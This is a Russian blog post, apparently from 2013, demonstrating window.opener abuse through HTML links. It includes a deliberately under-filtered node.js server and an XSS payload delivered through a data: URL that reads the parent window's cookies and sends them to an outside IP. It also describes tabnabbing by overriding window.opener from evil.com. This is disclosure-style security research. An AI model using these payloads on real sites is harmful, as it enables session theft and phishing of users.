{"id":164539,"date":"2013-01-02T15:32:03","date_gmt":"2013-01-02T11:32:03","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=164539"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=164539","title":{"rendered":"\u0410\u0442\u0430\u043a\u0443\u0435\u043c \u0447\u0435\u0440\u0435\u0437 HTML \u0442\u0435\u0433 \u0430<\/span>"},"content":{"rendered":"
\t\u0422\u0435\u0433 a \u2014 \u044d\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0446\u0435\u043d\u043d\u044b\u0439 \u043c\u0435\u0445, \u043d\u043e \u0438 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f window.opener.
\u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u0432\u0430\u0441 \u0436\u0434\u0435\u0442 \u0440\u0430\u0441\u0441\u043a\u0430\u0437 \u043e\u0431 \u043e\u0434\u043d\u043e\u0439 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0442\u0435\u0433\u0430 \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b.<\/p>\n

<\/a><\/p>\n

\u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435<\/h2>\n

\u0412\u0441\u0451 \u044d\u0442\u043e \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u043c\u0435\u043d\u044c\u0448\u0435 \u0433\u043e\u0434\u0430 \u043d\u0430\u0437\u0430\u0434. \u042f \u0437\u0430\u043c\u0435\u0442\u0438\u043b (\u0443\u0437\u043d\u0430\u043b), \u0447\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0433\u0438\u043f\u0435\u0440\u0441\u0441\u044b\u043b\u043a\u0438 \u0432 \u043d\u043e\u0432\u043e\u043c \u043e\u043a\u043d\u0435 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 JavaScript\u2019\u043e\u0432\u0441\u043a\u0438\u0439 window.opener.<\/p>\n

\u0414\u043b\u044f \u0441\u043f\u0440\u0430\u0432\u043a\u0438: window.opener \u0434\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u043c\u0443 \u043e\u043a\u043d\u0443 (\u043a \u0444\u0440\u0435\u0439\u043c\u0443-\u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044e), \u0442.\u0435 \u043a \u043e\u043a\u043d\u0443, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0432\u044b\u0437\u0432\u0430\u043b\u0438 window.open().<\/i><\/p>\n

\u0420\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u044f \u0441\u0440\u0430\u0437\u0443 \u043d\u0430\u0447\u0430\u043b \u0433\u0443\u0433\u043b\u0438\u0442\u044c, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u0432\u0440\u0430\u0437\u0443\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b. \u0412\u0441\u0451 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u043d\u043e \u0435\u0441\u043b\u0438 \u0431\u044b \u043d\u0435 \u043e\u0434\u043d\u043e \u00ab\u041d\u041e\u00bb:
Window.opener \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u0438\/\u0438\u043b\u0438 IP-\u0430\u0434\u0440\u0435\u0441\u0430 \u0440\u0430\u0437\u043d\u044b\u0435. <\/p>\n

\u041d\u0430 \u0434\u043d\u044f\u0445 \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u044e \u043f\u043e\u0447\u0442\u0443 \u0438 \u0432\u0438\u0436\u0443, \u0447\u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u042f\u043d\u0434\u0435\u043a\u0441\u0430:<\/p>\n

<\/p>\n

\u0421\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e \u0431\u0430\u0433\u0435, \u0442\u043e\u0447\u043d\u0435\u0435 \u043e \u0442\u0435\u043e\u0440\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0438 \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 window.opener( \u0434\u0430\u043b\u0435\u0435 w.o), \u0431\u044b\u043b\u043e \u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043e \u043c\u043d\u043e\u0439 \u043e\u043a\u043e\u043b\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u043d\u0430\u0437\u0430\u0434, \u044f \u0443\u0436\u0435 \u0438 \u043d\u0435 \u043d\u0430\u0434\u0435\u044f\u043b\u0441\u044f \u043d\u0430 \u043e\u0442\u0432\u0435\u0442.
\u041d\u043e \u043c\u0438\u0440 \u2013 \u0441\u0442\u0440\u0430\u043d\u043d\u0430\u044f \u0448\u0442\u0443\u043a\u0430, \u043d\u0435 \u0442\u0430\u043a \u043b\u0438? \ud83d\ude42<\/p>\n

\u0427\u0430\u0441\u0442\u044c 1<\/h3>\n

\u041e\u0442 \u0442\u0435\u043e\u0440\u0438\u0438 \u043a \u0434\u0435\u043b\u0443! <\/h2>\n

\u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u043c, \u0447\u0442\u043e \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443, \u0432 \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u0435\u043c \u0432\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0433\u0438\u043f\u0435\u0440\u0441\u0441\u044b\u043b\u043a\u0443.
\u041d\u0430\u043f\u0438\u0448\u0435\u043c \u043a\u043e\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u043d\u0430\u043c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.<\/p>\n

\/\/\u041a\u043e\u0434 \u21161 \/*\u0410\u0432\u0442\u043e\u0440 \u043a\u043e\u0434\u0430 \u043f\u0440\u043e\u0441\u0438\u0442 \u043f\u0440\u043e\u0449\u0435\u043d\u0438\u044f \u0437\u0430 \u0432\u0441\u0435 \u0431\u0430\u0433\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435  \u0441 \u043d\u0438\u043c. \u041a\u043e\u0434 \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u043f\u043e\u0434 node.js *\/ var http = require('http'); http.createServer(function (rq, rs) { var cookie="Super :"+Math.random(-1)*30\/13+": Mario"; \/\/\u043f\u0440\u0438 \u043a\u0430\u0436\u0434\u043e\u043c \u043d\u043e\u0432\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435, \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u0443\u043a\u0438 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0437\u043d\u044b\u043c   rs.writeHead(200, {'Content-Type': 'text\/html',                      'Set-Cookie': cookie});   if(!require('url').parse(rq.url).query){ \/\/ \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445   rs.end('<h2>ERROR!<\/h2><br>Example: http:\/\/127.0.0.1:8080\/wo.bug?host=http:\/\/google.com\/<br>Shutting down :)'); console.log('[DEBUG] URL: '+rq.url+' is not valid!'); \/\/ \u043d\u0435\u043c\u043d\u043e\u0436\u043a\u043e \u0434\u0435\u0431\u0430\u0433\u0430   console.log('Achtung!');   process.kill(process.pid); \/\/\u0447\u0442\u043e\u0431\u044b \u043d\u0430\u0432\u0435\u0440\u043d\u044f\u043a\u0430 :)   }   var host=require('url').parse(rq.url, true).query.host, \/\/\u043f\u0430\u0440\u0441\u0438\u043c   host=host.replace(\/ \/g,'%20'),\/\/\u0420\u0435\u0448\u0438\u043c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0441 \u043e\u0431\u0440\u0435\u0437\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0431\u0435\u043b\u0430   host=host.replace(\/<\/g,'&'+'lt;'), \/\/antiXSS   host=host.replace(\/>\/g,'&'+'gt;'), \/\/antiXSS   host=host.replace(\/javascript:\/g,''); \/\/antiXSS   console.log('URL: '+host); \/\/\u0412\u044b\u0432\u043e\u0434 \u0441\u0441\u044b\u043b\u043a\u0438 \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u044c   rs.end('<center><br><a href='+host+' target="_blank">click-click<\/a><br>Hey, '+cookie+'! <\/center>'); \/\/"\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439" \u0432\u044b\u0432\u043e\u0434 }).listen(8080);  \/\/\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0430 8080 \u043f\u043e\u0440\u0442\u0443  <\/code><\/pre>\n
  \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u043a\u043e\u0434\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u043f\u0443\u0449\u0435\u043d\u0430 \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 data. \u0427\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443, \u0438 \u043f\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c w.o, \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c XSS \u0430\u0442\u0430\u043a\u0443. 
  \u0414\u043b\u044f \u0442\u0435\u0441\u0442\u043e\u0432 \u044f \u0432\u0437\u044f\u043b \u00ab\u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0442\u0440\u043e\u0439\u043a\u0443\u00bb \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432: Opera\/12.12, FireFox\/18.00, Chrome\/23.0.1271.97.<\/p>\n
FireFox<\/h3>\n
  \u0418\u0442\u0430\u043a, \u043f\u0435\u0440\u0435\u0434\u0430\u0434\u0438\u043c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 href, \u0442\u0435\u0433\u0430 a, \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u00abdata:,1\u00bb:<\/p>\n
  <\/p>\n
  \u041f\u043e\u0441\u043b\u0435 \u043d\u0430\u0436\u0430\u0442\u0438\u044f \u043d\u0430 \u0433\u0438\u043f\u0435\u0440\u0441\u0441\u044b\u043b\u043a\u0443 \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e w.o \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d:<\/p>\n
  <\/p>\n
  \u0410 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u043c\u0443 \u043e\u043a\u043d\u0443. 
  \u041e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0443\u0431\u0435\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u044d\u0442\u043e\u043c.<\/p>\n
  <\/p>\n
  \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f w.o, \u043c\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u0443\u043a\u0430\u043c \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043e\u043a\u043d\u0430, \u043d\u043e \u0432\u043e\u0442 \u043f\u043e\u0447\u0435\u043c\u0443 document.cookie=window.opener.document.cookie \u044f \u043d\u0435 \u0437\u043d\u0430\u044e, \u0447\u0435\u0441\u0442\u043d\u043e. \u0417\u0430\u043c\u0435\u0447\u0443, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f FF.<\/p>\n
  \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u043d\u0430 VM \u0441 XP SP3 \u0438 FF 17, \u0442\u0430\u043a\u0430\u044f \u0436\u0435 \u043a\u0430\u0440\u0442\u0438\u043d\u0430:<\/p>\n
  <\/p>\n
  \u041e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c exploit, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u0435\u0433 \u00ab\u0430\u00bb, \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b data \u0438 w.o, \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u043a\u0443\u043a(\u0434\u0430 \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0447\u0435\u0433\u043e \u0443\u0433\u043e\u0434\u043d\u043e).<\/p>\n
  Payload:<\/p>\n
var snif=new Image(), \/\/\u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443 ck=window.opener.document.cookie, \/\/\u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u0443\u043a\u0438 \u0438\u0437 \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043e\u043a\u043d\u0430 concat = function() { return Array.prototype.slice.call(arguments).join("")};\/\/\u043e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u0435\u043c \u0441\u0442\u0440\u043e\u043a\u0438 \u0431\u0435\u0437 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043d\u0430\u043a\u0430 +, \u0442\u0430\u043a \u043a\u0430\u043a \u0437\u043d\u0430\u043a \u043f\u043b\u044e\u0441 \u043f\u0440\u0438 GET \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0440\u0430\u0432\u043d\u043e\u0441\u0438\u043b\u0435\u043d \u043f\u0440\u043e\u0431\u0435\u043b\u0443, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u043e\u0448\u0438\u0431\u043e\u0447\u043d\u043e\u043c\u0443 \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441\u0443 JavaScript snif.src=concat('http:\/\/192.168.1.4:8081\/?cok=',ck); \/\/\u043e\u0442\u0441\u044b\u043b\u0430\u0435\u043c \u043a\u0443\u043a\u0438 (192.168.1.4-\u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 IP \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b) <\/code><\/pre>\n
  \u041f\u0435\u0440\u0435\u0434\u0430\u0435\u043c \u044d\u0442\u043e \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e host(\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b data, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e: data:text\/html, <script>\u041d\u0430\u0448 payload<\/script><\/code> ).\u041d\u0430\u0436\u0438\u043c\u0430\u0435\u043c \u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0443 \u0438 \u043b\u044e\u0431\u0443\u0435\u043c\u0441\u044f \u043a\u0443\u043a\u0430\u043c\u0438:
  <\/p>\n
  \u0410 \u044d\u0442\u043e \u043e\u043a\u043d\u043e, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u043d\u0435\u0434\u0440\u0438\u043b\u0438 \u043d\u0430\u0448 \u043a\u043e\u0434:<\/p>\n
  <\/p>\n
  \u041a\u0430\u043a \u0432\u0438\u0434\u0438\u0442\u0435, \u043c\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043c\u043e\u0433\u043b\u0438 \u0443\u043a\u0440\u0430\u0441\u0442\u044c \u043a\u0443\u043a\u0438.<\/p>\n
Opera<\/h3>\n
  \u0421 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u043c Opera \u043f\u043e\u0447\u0442\u0438 \u0442\u0430\u043a \u0436\u0435, \u043a\u0430\u043a \u0438 \u0441 FireFox. \u0422\u0430\u043a \u0447\u0442\u043e \u0448\u0430\u0433\u0438 \u0431\u0443\u0434\u0443\u0442 \u0442\u0435 \u0436\u0435.<\/p>\n
  \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043b\u0438 w.o: <\/p>\n
  <\/p>\n
  \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u043c\u043e\u0436\u0435\u043c \u043b\u0438 \u043c\u044b \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043a\u0443\u043a\u0438:<\/p>\n
  <\/p>\n
  \u0412\u0438\u0434\u0438\u043c, \u0447\u0442\u043e \u043c\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043a\u0443\u043a\u0438 \u0438\u0437 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u0432\u043a\u043b\u0430\u0434\u043a\u0438(\u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043e\u043a\u043d\u0430).
  \u041e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. \u041a\u043e\u0434 payload\u2019\u0430 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u0430\u043a\u043e\u0439 \u0436\u0435, \u043a\u0430\u043a \u0438 \u0434\u043b\u044f FF.<\/p>\n
  \u041f\u0435\u0440\u0435\u0434\u0430\u0435\u043c \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e host \u043d\u0430\u0448 exploit \u0438 \u043e\u043f\u044f\u0442\u044c \u043b\u044e\u0431\u0443\u0435\u043c\u0441\u044f \u043a\u0443\u043a\u0430\u043c\u0438:<\/p>\n
  <\/p>\n
  \u041e\u043a\u043d\u043e \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439:<\/p>\n
  <\/p>\n
  \u0418\u0442\u0430\u043a, \u043c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0443\u043a\u0440\u0430\u0441\u0442\u044c \u043a\u0443\u043a\u0438. \u0414\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f, \u043d\u043e \u0432\u0435\u0434\u044c \u0435\u0449\u0435 \u043e\u0441\u0442\u0430\u043b\u0441\u044f Google Chrome.<\/p>\n
Chrome<\/h3>\n
  \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a w.o:<\/p>\n
  <\/p>\n
  W.o \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d, \u043d\u043e \u0425\u0440\u043e\u043c \u043d\u0435 \u0434\u0430\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c \u043e\u043a\u043d\u0430-\u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044f:<\/p>\n
  <\/p>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u0441\u0430\u043c\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u043d\u0430 \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0434 \u0434\u0440\u0443\u0433\u0438\u043c \u0443\u0433\u043b\u043e\u043c.
  \u0410 \u0447\u0442\u043e \u0431\u0443\u0434\u0435\u0442, \u0435\u0441\u043b\u0438 \u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b data \u0444\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u0442\u0441\u044f? 
  \u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0432 \u043d\u0430\u0448 \u043a\u043e\u0434 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u0443\u044e \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044e, \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 data. <\/p>\n
  \u041a\u043e\u0434 \u043f\u0440\u0438\u043c\u0435\u0442 \u0432\u0438\u0434:<\/p>\n
\/*\u2026*\/   host=host.replace(\/<\/g,'&'+'lt;'), \/\/antiXSS   host=host.replace(\/>\/g,'&'+'gt;'), \/\/antiXSS   host=host.replace(\/javascript:\/g,''), \/\/antiXSS   host=host.replace(\/data:\/g,''); \/\/Data \u043d\u0435 \u043f\u0440\u043e\u0439\u0434\u0435\u0442! \/*\u2026*\/ <\/code><\/pre>\n
  \u0412\u043d\u0435\u0441\u044f \u044d\u0442\u0443 \u043f\u043e\u043f\u0440\u0430\u0432\u043a\u0443 \u0432 \u043a\u043e\u0434, \u043c\u044b \u0431\u043e\u043b\u044c\u0448\u0435 \u043d\u0435 \u0441\u043c\u043e\u0436\u0435\u043c \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 XSS \u0430\u0442\u0430\u043a\u0443, \u043d\u043e \u0432\u0432\u0435\u0441\u0442\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0437\u0430\u0431\u043b\u0443\u0436\u0434\u0435\u043d\u0438\u0435, \u043f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0432 w.o, \u043c\u044b \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b.<\/p>\n
\u0427\u0430\u0441\u0442\u044c 2<\/h3>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0435\u0440\u0435\u0434\u0430\u0434\u0438\u043c, \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e host, \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 \u0441\u0430\u0439\u0442 evil.com.<\/p>\n
FireFox<\/h3>\n
  <\/p>\n
  \u0412 FF 18 w.o \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u043d\u043e \u043c\u044b \u043d\u0435 \u0438\u043c\u0435\u0435\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u0443\u0442\u044c \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u0444\u0440\u0435\u0439\u043c(\u0432\u043a\u043b\u0430\u0434\u043a\u0443), \u0442\u0430\u043a \u043a\u0430\u043a \u0434\u043e\u043c\u0435\u043d\u044b \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b \u0438 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0430\u043c \u044d\u0442\u043e \u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442.<\/p>\n
Opera<\/h3>\n
  <\/p>\n
  \u0421\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0441 \u044d\u0442\u0438\u043c \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u043c \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u0441 FireFox. <\/p>\n
Chrome<\/h3>\n
  <\/p>\n
  \u0412 \u0425\u0440\u043e\u043c\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a w.o \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u043d\u043e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0440\u0435\u0436\u0435\u0442 \u043d\u0430\u0448\u0438 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e \u043c\u0438\u043d\u0438\u043c\u0443\u043c\u0430.<\/p>\n
  <\/p>\n
\u0410\u0442\u0430\u043a\u0443\u0435\u043c!<\/h2>\n
FireFox<\/h3>\n
  <\/p>\n
  \u041f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435: <\/p>\n
  <\/p>\n
Opera<\/h3>\n
  <\/p>\n
  \u041f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u043c w.o:<\/p>\n
  <\/p>\n
Chrome<\/h3>\n
  <\/p>\n
  \u041f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u043c:<\/p>\n
  <\/p>\n
\u041f\u0438\u0448\u0435\u043c exploit<\/h3>\n
  \u041d\u0443 \u0430 \u0435\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0442\u043e \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0438 exploit \ud83d\ude42<\/p>\n
